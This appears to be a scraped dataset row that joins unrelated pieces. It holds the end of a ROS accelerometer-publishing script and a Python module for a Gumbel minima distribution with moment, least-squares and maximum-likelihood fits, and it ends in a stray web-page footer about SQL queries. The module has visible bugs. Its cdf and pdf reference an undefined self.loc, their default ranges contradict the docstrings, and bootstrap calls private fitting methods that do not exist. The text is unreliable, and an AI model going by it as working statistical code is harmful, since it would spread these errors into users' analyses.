imu_msg = Imu()
imu_msg.linear_acceleration_covariance = [
0, 0, 0,
0, 0, 0,
0, 0, 0
]
imu_msg.angular_velocity_covariance = [
0, 0, 0,
0, 0, 0,
0, 0, 0
]
while not rospy.is_shutdown():
x, y, z = sensor.acceleration
imu_msg.linear_acceleration.x = x
imu_msg.linear_acceleration.y = y
imu_msg.linear_acceleration.z = z
pub.publish(imu_msg)
rospy.sleep(1)
rospy.logwarn('MMA8451 Accelerometer Offline')
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:class:`GumbelMin` class and functions related to Gumbel (minima) distribution.
"""
import numpy as np
from scipy.special import zetac
from scipy.optimize import leastsq, fsolve
from matplotlib.pyplot import figure, ylabel, yticks, plot, legend, grid, show, xlabel, ylim, savefig
from .empirical import empirical_cdf
from .gumbel import _euler_masceroni as em
# todo: move fit methods e.g. _msm from class to standalone functions (importable)
# todo: check fit procedures (read up once more and check implementation)
# todo: create unit tests
class GumbelMin(object):
"""
The Gumbel minima distribution.
The cumulative distribution function is defined as::
F(x) = 1 - exp{-exp[(x-a)/b]}
where `a` is location parameter and `b` is the scale parameter.
Parameters
----------
loc : float
Gumbel location parameter.
scale : float
Gumbel scale parameter.
data : array_like, optional
Sample data, used to establish empirical cdf and is included in plots.
To fit the Gumbel distribution to the sample data, use :meth:`GumbelMin.fit`.
Attributes
----------
loc : float
Gumbel location parameter.
scale : float
Gumbel scale parameter.
data : array_like
Sample data.
Examples
--------
To initiate an instance based on parameters, use:
>>> from qats.stats.gumbelmin import GumbelMin
>>> gumb = GumbelMin(loc, scale)
If you need to establish a Gumbel instance based on a sample data set, use:
>>> gumb = GumbelMin.fit(data, method='msm')
References
----------
1. Bury, K.V. (1975) Statistical models in applied science. Wiley, New York
2. Haver, S. (2007), "Bruk av asymptotiske ekstremverdifordelinger"
3. `Plotting positions <http://en.wikipedia.org/wiki/Q%E2%80%93Q_plot>`_, About plotting positions
4. `Usable estimators for parameters in Gumbel distribution
<http://stats.stackexchange.com/questions/71197/usable-estimators-for-parameters-in-gumbel-distribution>`_
5. `Bootstrapping statistics <https://en.wikipedia.org/wiki/Bootstrapping_(statistics)>`_
"""
def __init__(self, loc=None, scale=None, data=None):
self.location = loc
self.scale = scale
if data is not None:
self.data = np.array(data)
else:
self.data = None
@property
def cov(self):
"""
Distribution coefficient of variation (C.O.V.)
Returns
-------
c : float
distribution c.o.v.
"""
return self.std / self.mean
@property
def ecdf(self):
"""
Median rank empirical cumulative distribution function associated with the sample
Notes
-----
Gumbel recommended the following mean rank quantile formulation Pi = i/(n+1).
This formulation produces a symmetrical CDF in the sense that the
same plotting positions will result from the data regardless of
whether they are assembled in ascending or descending order.
A more sophisticated median rank formulation Pi = (i-0.3)/(n+0.4) approximates the
median of the distribution free estimate of the sample variate to about
0.1% and, even for small values of n, produces parameter estimations
comparable to the result obtained by maximum likelihood estimations (Bury, 1999, p43)
A median rank method, pi=(i-0.3)/(n+0.4), is chosen to approximate the mean of the distribution [2]
The empirical cdf is also used as plotting positions when plotting the sample
on probability paper.
"""
x = np.array(self.data)
try:
#p = (np.arange(x.size) + 1. - 0.3) / (x.size + 0.4)
p = empirical_cdf(self.data.size, kind='median')
return p
except TypeError:
print("The sample is not defined.")
@property
def kurt(self):
"""
Distribution kurtosis
Returns
-------
k : float
distribution kurtosis
"""
try:
k = 12. / 5.
return k
except TypeError:
print("Distribution parameters are not defined.")
@property
def mean(self):
"""
Distribution mean value
Returns
-------
m : float
distribution mean value
"""
try:
m = self.location - self.scale * em()
return m
except TypeError:
print("Distribution parameters are not defined.")
@property
def median(self):
"""
Distribution median value
Returns
-------
m : float
distribution median value
"""
try:
m = self.location + self.scale * np.log(np.log(2.))
return m
except TypeError:
print("Distribution parameters are not defined.")
@property
def mode(self):
"""
Distribution mode value
Returns
-------
m : float
distribution mode value
"""
try:
m = self.location
return m
except TypeError:
print("Distribution parameters are not defined.")
@property
def std(self):
"""
Distribution standard deviation
Returns
-------
s : float
distribution standard deviation
"""
try:
s = np.pi * self.scale / np.sqrt(6)
return s
except TypeError:
print("Distribution parameters are not defined.")
@property
def skew(self):
"""
Distribution skewness
Returns
-------
s : float
distribution skewness
"""
try:
# zetac is the complementary Riemann zeta function (zeta function minus 1)
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.special.zetac.html
s = -12. * np.sqrt(6.) * (1. + zetac(3)) / np.pi ** 3
return s
except TypeError:
print("Distribution parameters are not defined.")
def bootstrap(self, size=None, method='msm', N=100):
"""
Parametric bootstrapping of source distribution
Parameters
----------
size : int
bootstrap sample size. default equal to source sample size
method : {'msm','lse','mle'}
method of fit, optional
'msm' = method of sample moments
'lse' = least-square estimation
'mle' = maximum likelihood estimation
N : int
number of bootstrap samples. default equal to 10
Returns
-------
array-like
m - mean distribution parameters
array_like
cv - coefficient of variation of distribution parameter
Notes
-----
In statistics, bootstrapping is a method for assigning measures of accuracy
to sample estimates (variance,quantiles). This technique allows estimation of the
sampling distribution of almost any statistic using only very simple methods. Generally,
it falls in the broader class of resampling methods. In this case a parametric model is fitted
to the data, and samples of random numbers with the same size as the original data,
are drawn from this fitted model. Then the quantity, or estimate, of interest is
calculated from these data. This sampling process is repeated many times as for other
bootstrap methods. If the results really matter, as many samples as is reasonable,
given available computing power and time, should be used. Increasing the number of
samples cannot increase the amount of information in the original data, it can only
reduce the effects of random sampling errors which can arise from a bootstrap procedure itself.
See [5] about bootstrapping.
"""
options = {'msm': self._msm, 'lse': self._lse, 'mle': self._mle}
assert method.lower() in options.keys(), "Method must be either %s" % (' or '.join(options.keys()))
if size is None:
assert self.data is not None, "Either size has to be specified or a sample has to be specified."
size = np.size(self.data)
i = 0
par = np.zeros((N, 2))
while (i < N):
x = self.rnd(size=size)
par[i, :] = options[method](x)
i += 1
m = par.mean(axis=0)
cv = par.std(axis=0, ddof=1) / m
return m, cv
def cdf(self, x=None):
"""
Cumulative distribution function (cumulative probability) for specified values x
Parameters
----------
x : array_like
values
Returns
-------
cdf : array
cumulative probabilities for specified values x
Notes
-----
A range of x values [location, location+3*std] are applied if x is not specified.
"""
try:
if x is None:
x = np.linspace(self.loc, self.loc - 3. * self.std, 100)
else:
x = np.array(x)
assert self.scale > 0., "The scale parameter must be larger than 0."
z = (x - self.location) / self.scale
p = 1. - np.exp(-np.exp(z))
return p
except TypeError:
print("Distribution parameters are not defined")
def fit(self, data=None, method='msm', verbose=False):
"""
Determine distribution parameters by fit to sample.
Parameters
----------
data : array_like
sample, optional
method : {'msm','lse','mle'}
method of fit, optional
'msm' = method of sample moments
'lse' = least-square estimation
'mle' = maximum likelihood estimation
verbose : bool
turn on output of fitted parameters
Notes
-----
If data is not input any data stored in object (self.data) will be used.
"""
options = {'msm': msm, 'lse': lse, 'mle': mle}
assert method.lower() in options.keys(), "Method must be either %s" % (' or '.join(options.keys()))
if data is not None:
# update sample data
self.data = np.array(data).reshape(np.shape(data)) # make vector shaped
try:
self.location, self.scale = options[method](self.data)
if verbose:
print("Fitted parameters:\nlocation = %(location)5.3g\nscale = %(scale)5.3g" % self.__dict__)
except TypeError:
print("The sample data is not defined.")
def fit_from_weibull_parameters(self, wa, wb, wc, n, verbose=False):
"""
Calculate Gumbel distribution parameters from n independent Weibull distributed variables.
Parameters
----------
wa : float
Weibull location parameter
wb : float
Weibull scale parameter
wc : float
Weibull shape parameter
n : int
Number independently distributed variables
verbose : bool
print fitted parameters
Notes
-----
A warning is issued if Weibull shape parameter less than 1. In this case,
the convergence towards asymptotic extreme value distribution is slow
, and the asymptotic distribution will be non-conservative relative
to the exact distribution. The asymptotic distribution is correct with Weibull
shape equal to 1 and conservative with Weibull shape larger than 1.
These deviations diminish with larger samples. See [1, p. 380].
"""
raise NotImplementedError("Formula for deriving Gumbel minimum distribution parameter is not implemented.")
pass
# self.location = wa + wb * np.log(n) ** (1. / wc)
# self.scale = 1. / (wc / wb * np.log(n) ** ((wc - 1.) / wc))
# if verbose:
# print "Fitted parameters:\nlocation = %(location)5.3g\nscale = %(scale)5.3g" % self.__dict__
def gp_plot(self, showfig=True, save=None):
"""
Plot data on Gumbel paper (linearized scales))
Parameters
----------
showfig : bool
show figure immediately on screen, default True
save : filename
save figure to file, default None
"""
figure()
x = np.sort(self.data)
# sample
z_data = -np.log(-np.log(self.ecdf))
plot(x, z_data, 'ko', label='Data')
# fit distributions
a_msm, b_msm = msm(self.data)
a_mle, b_mle = mle(self.data)
a_lse, b_lse = lse(self.data)
z_msm = (x - a_msm) / b_msm
z_mle = (x - a_mle) / b_mle
z_lse = (x - a_lse) / b_lse
plot(x, z_msm, '-r', label='MSM')
plot(x, z_mle, '--g', label='MLE')
plot(x, z_lse, ':b', label='LSE')
# plotting positions and plot configurations
p = np.array([0.1, 0.2, 0.5, 0.7, 0.8, 0.9, 0.95, 0.99, 0.999, 0.9999])
y = -np.log(-np.log(p))
yticks(y, p)
legend(loc='upper left')
ylim(y[0], y[-1])
xlabel('X')
ylabel('Cumulative probability')
grid(True)
if showfig:
show()
elif save is not None:
savefig(save)
else:
pass
def invcdf(self, p=None):
"""
Inverse cumulative distribution function for specified quantiles p
Parameters
----------
p : array_like
quantiles (or. cumulative probabilities if you like)
Returns
-------
x : array
values corresponding to the specified quantiles
Notes
-----
A range of quantiles from 0.001 to 0.999 are applied if quantiles are not specified
"""
try:
if p is None:
p = np.linspace(0.001, 0.999, 100)
else:
p = np.array(p)
assert self.scale > 0., "The scale parameter must be larger than 0."
x = np.zeros(np.shape(p))
x[p == 1.] = np.inf # asymptotic
x[(p < 0.) | (p > 1.)] = np.nan # probabilities out of bounds
z = (p >= 0.) & (p < 1.) # valid quantile range
x[z] = self.location + self.scale * np.log(-np.log(1.-p[z]))
return x
except TypeError:
print("Distribution parameters are not defined")
def pdf(self, x=None):
"""
Probability density function for specified values x
Parameters
----------
x : array_like
values
Returns
-------
pdf : array
probability density function for specified values x
Notes
-----
A range of x values [location, location+3*std] are applied if x is not specified.
"""
try:
if x is None:
x = np.linspace(self.loc, self.loc - 3. * self.std, 100)
else:
x = np.array(x)
assert self.scale > 0., "The scale parameter must be larger than 0."
z = (x - self.location) / self.scale
p = (1. / self.scale) * np.exp(z - np.exp(z))
return p
except TypeError:
print("Distribution parameters are not defined")
def plot(self, showfig=True, save=None):
"""
Plot data on regular scales
Parameters
----------
showfig : bool
show figure immediately on screen, default True
save : filename including suffix
save figure to file, default None
"""
figure()
if self.data is not None:
plot(np.sort(self.data), self.ecdf, 'ko', label='Data')
y = np.linspace(0.001, 0.9999, 1000)
x = self.invcdf(p=y)
plot(x, y, '-r', label='Fitted')
xlabel('X')
ylabel('Cumulative probability')
legend(loc='upper left')
grid(True)
if showfig:
show()
elif save is not None:
savefig(save)
else:
pass
def rnd(self, size=None, seed=None):
"""
Draw random samples from probability distribution
Parameters
----------
size : int|numpy shape, optional
sample size (default 1 random value is returned)
seed : int
seed for random number generator (default seed is random)
Returns
-------
x : array
random sample
"""
if seed is not None:
np.random.seed(seed)
r = np.random.random_sample(size)
x = self.invcdf(p=r)
return x
def lse(x):
"""
Fit distribution parameters to sample by method of least square fit to empirical cdf
Parameters
----------
x : array_like
sample
Notes
-----
Uses an approximate median rank estimate for the empirical cdf.
"""
x = np.sort(x)
f = empirical_cdf(x.size, kind='median')
fp = lambda v, z: 1. - np.exp(-np.exp((z - v[0]) / v[1])) # parametric Gumbel function
e = lambda v, z, y: (fp(v, z) - y) # error function to be minimized
a0, b0 = msm(x) # initial guess based on method of moments
# least square fit
p, cov, info, msg, ier = leastsq(e, [a0, b0], args=(x, f), full_output=1)
return p[0], p[1]
def mle(x):
"""
Fit distribution parameters to sample by maximum likelihood estimation
Parameters
----------
x : array_like
sample
Notes
-----
MLE equation set is given in 'Statistical Distributions' by Forbes et.al. (2010) and referred
at [4]
"""
def mle_eq(p, z):
"""
MLE equation set
Parameters
----------
p : list
distribution parameters a, b, c
z : array_like
data
"""
loc, scale = p # unpack parameters
n = z.size
out = [loc + scale * np.log(1. / n * np.sum(np.exp(z / scale))),
z.mean() - np.sum(z * np.exp(z / scale)) / np.sum(np.exp(z / scale)) - scale]
return out
x = np.array(x)
a0, b0 = msm(x) # initial guess
a, b = fsolve(mle_eq, [a0, b0], args=x)
return a, b
def msm(x):
"""
Fit distribution parameters to sample by method of sample moments
Parameters
----------
x : array_like
sample
Notes
-----
See description in [1] and [2].
"""
x = np.array(x)
b = np.sqrt(6.) * np.std(x, ddof=1) / np.pi # using the unbiased sample standard deviation
a = x.mean() + em() * b
return a, b
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.